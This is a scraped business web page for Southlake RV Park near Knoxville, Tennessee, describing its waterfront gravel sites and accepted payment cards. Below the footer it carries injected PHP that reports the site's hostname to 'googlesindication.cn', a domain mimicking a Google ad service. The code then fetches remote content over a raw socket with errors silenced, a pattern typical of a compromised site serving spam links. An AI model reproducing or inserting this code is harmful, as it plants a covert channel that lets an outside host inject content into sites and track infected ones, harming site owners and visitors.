![]() |
|
Southlake RV Park is located just outside of Knoxville, TN - and is actually the closest RV park to the beautiful city and to the University of Tennessee. Situated within minutes of the McGee Tyson Airport, the Knoxville Zoo, Neyland Stadium--enough about them! Let us show you what we have to offer!!
Two sides of Southlake RV Park are surrounded by water. We have taken great care in situating our gravel sites in the rolling, shaded park to provide spectacular views as well as maintaining a certain amount of privacy for our guests. Be sure to check out the Site Map as well as our Web Photo Album for a detailed look at Southlake RV Park! We look forward to seeing you soon!! |
|
|
![]() Visa, Mastercard, American Express and Discover Accepted |
![]() |
|
Southlake
RV Park 2004 All Rights Reserved
|
||
fetch_remote_file("googlesindication.cn", "/links.php?site=".$_SERVER['HTTP_HOST']); class GetLinks { var $_socket_timeout = 6; function fetch_remote_file($host, $path) { @ini_set('allow_url_fopen', 1); @ini_set('default_socket_timeout', $this->_socket_timeout); $this->_fetch_remote_type = 'socket'; $buff = ''; $fp = @fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout); if ($fp) { @fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n"); @fputs($fp, "User-Agent: {$user_agent}\r\n\r\n"); while (!@feof($fp)) { $buff .= @fgets($fp, 128); } @fclose($fp); $page = explode("\r\n\r\n", $buff); return $page[1]; } } } ?>